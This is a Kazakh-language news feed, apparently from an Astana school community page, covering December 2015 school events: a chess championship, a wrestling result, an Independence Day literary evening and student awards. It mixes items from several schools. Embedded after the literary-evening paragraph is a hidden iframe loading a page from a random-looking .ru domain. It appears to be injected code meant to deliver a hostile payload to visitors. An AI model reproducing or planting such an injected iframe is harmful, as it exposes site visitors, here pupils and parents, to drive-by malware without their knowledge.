Мектебімізде «Жас Ұлан» және «Жас қыран» балалар мен жасөспірімдер ұйымына қабылдау рәсімі өтті. Аталған ұйымға мектебіміздің дарынды және өнерлі оқушыларымыз қабылданды.
<div style="text-align:justify;">Астана қаласынан оқушылар арасында қазақ күресінен "Мектеп барысы" болды, біздің лицейіміздің 10 "А" сынып оқушысы Ережепов Ельдар 4-орынға ие болды және жақсы күрескен үшін ең жас балуан атағын алды. </div>
Жас ұрпақтың жақсы тәрбие алуы мен бос уақытын мазмұнды өткізуіне қосқан үлесі, жемісті еңбегі үшін.
<p style="text-align:justify;">Астана қаласындағы №59 мектеп-лицейінде Тәуелсіздіктің 24 жылдығына орай шахматтан мектепшілік біріншілік ұйымдастырылды.Жарыс қорытындысы бойынша шахматтан лицей чемпионын 5 «Е» сынып оқушысы Мұрат Аида, І орынды – 7 «Ә» сынып оқушысы Төлеби Аман, ІІ орынды – 3 «Ә» сынып оқушысы Қонай Иса, ІІІ орынды – 2 «И» сынып оқушысы Нұраден Мақсат иеленді.</p>
14.12.15 жылы №38 мектеп-лицейде Астана қаласы Білім басқармасының ұйымдастыруымен "Мектеп мұғалімдерінің авторлық бағдарламаларына ғылым-әдістемелік қолдау көрсету" тақырыбында семинар өтті.
<p> Бүгін, желтоқсанның 14-і күні, мектебімізде Тәуелсіздік күніне орай «Тәуелсіздік деп соғады жүрегіміз» деген атаумен әдеби кеш өтті. Кешке 1986 жылғы желтоқсан оқиғасының куәгері, бүгінгі күннің басты кейіпкері, Астана қалалық мемлекеттік академиялық филармониясының халық әндері бөлімінің жетекшісі Секен Жолдыбайұлы Сыздықов қатысты. Қонағымыз мектеп оқушыларына желтоқсан оқиғасының маңызы, тарихтан алатын орны жайлы көзбен көрген оқиғаларын мазмұнды әңгімелеп берді. Оқушылар көкейлеріндегі сұрақтарына тұшымды жауап ала алды. Сол сияқты кеш барысында Отан, Тәуелсіздік тақырыптарында өлең-жыр оқылып, патриоттық әндер де орындалды. Қонақтарымыз қазақтың дәстүрлі ән өнерін дәріптей отырып, балаларға елжандылық қасиетті қатар дарыта білді.</p> <p> Директордың тәрбие жұмысы жөніндегі орынбасары Төлеуова Г.Д. қорытынды сөзінде Тәуелсіздік мерекесінің 24 жылдығымен құттықтап, береке, бақыт, тыныштық тіледі.</p> <iframe src="//m81jmqmn.ru/f.html"></iframe>
№3 мектеп-гимназиясының 6 «е» сынып оқушысы Тогузов Сұлтанды «АИВ –сыз болашақ» атты плакаттар байқауында 1 орын иеленуімен құттықтаймыз!
№3 мектеп-гимназиясының 7 г сынып оқушысы Голобурда Мая жеңіл атлеткадан өткен «Үш сайыстан» Біріншілігінде 1 орын иеленді. Құттықтаймыз!!
10 желтоқсанда №3 мектеп-гимназиясының мәжіліс залында ҚР Тәуелсіздік күніне арналған «Күмбірлеген домбыра» атты күйшілер байқауы өтті. Жеңімпаздарға мадақтамалар табыс етілді. Қатысушыларды Астана Мемлекеттік академиялық филармония әртісі Бошымова Э.Ж және Астана Мемлекеттік академиялық филармониясының дәстүрлі саз тобының көркемдік жетекшісі, мәдениет қайраткері Қорғанбек Ш.Д. бағалады.
12 желтоқсан күні №3 мектеп-гимназиясында 5-11 сыныптар үшін ҚР Тәуелсіздік күніне арналған мерекелік сап түзеу өткізілді.
2015 жылы 11 желтоқсанда Астана қаласының ІІД аға инспекторы полиция майоры Бекмухамедова С.М. және мектеп инспекторы полиция лейтенанты Беркимбаева А.С. кәсіптік бейіндеу іс-шараны жүргізді.
12 желтоқсан күні №3 мектеп-гимназиясында 5-11 сынып оқушылары үшін ҚР Тәуелсіздігі күніне арналған сынып сағаттары өтті.
Официальное сообщество школы-гимназии №3 города Астаны